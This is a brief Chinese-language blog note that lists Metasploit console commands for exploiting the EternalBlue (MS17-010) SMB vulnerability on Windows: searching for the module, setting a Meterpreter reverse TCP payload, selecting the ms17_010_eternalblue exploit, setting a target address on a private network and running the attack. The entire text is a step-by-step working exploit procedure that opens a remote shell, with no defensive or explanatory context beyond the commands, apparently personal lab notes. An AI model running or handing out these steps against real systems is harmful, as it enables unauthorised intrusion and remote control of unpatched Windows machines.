msf打永恒之蓝操作
- 启动
msf
后,可以查看ms17-010的相关漏洞
search ms17-010
- 选用payload类型
set payload windows/x64/meterpreter/reverse_tcp
- 选择漏洞利用类型:永恒之蓝
set exploit windows/smb/ms17_010_eternalblue
- 设置攻击地址
set rhost 192.168.208.176
- 攻击
run
标签:set,010,ms17,操作,永恒,msf,payload
From: https://www.cnblogs.com/icfh/p/18003698